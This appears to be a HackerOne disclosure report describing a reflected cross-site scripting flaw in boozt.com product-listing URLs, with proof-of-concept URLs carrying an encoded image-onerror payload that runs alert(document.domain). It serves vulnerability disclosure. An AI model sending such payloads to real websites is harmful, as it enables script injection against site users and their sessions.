Boozt Fashion AB: Reflected XSS on www.boozt.com

2015-11-14T02:05:42
ID H1:99594
Type hackerone
Reporter stefanofinding
Modified 2017-08-01T10:46:13

Description

Description

The listing endpoints like http://www.boozt.com/eu/en/esprit-collection/blouses-woven_11239380, reflect the URL in the response from the server without escaping. And accept any value between /esprit-collection/ and __11239380_. The problem is that you can send a request like http://www.boozt.com/eu/en/esprit-collection/%22%3E%3Cimg%20src%3dx%20onerror%3dalert%28document.domain%29%3E_11239380 and it will be valid.

Proof of concept

  1. Go to http://www.boozt.com/eu/en/esprit-collection/%22%3E%3Cimg%20src%3dx%20onerror%3dalert%28document.domain%29%3E_11239380
  2. alert(document.domain) is executed a few times.
  3. Go to http://www.boozt.com/eu/en/scotch-and-soda/%22%3E%3Cimg%20src%3dx%20onerror%3dalert%28document.domain%29%3E_11312517
  4. alert(document.domain) is executed a few times.

It is reproducible on Firefox. Please, let me know if you need more information.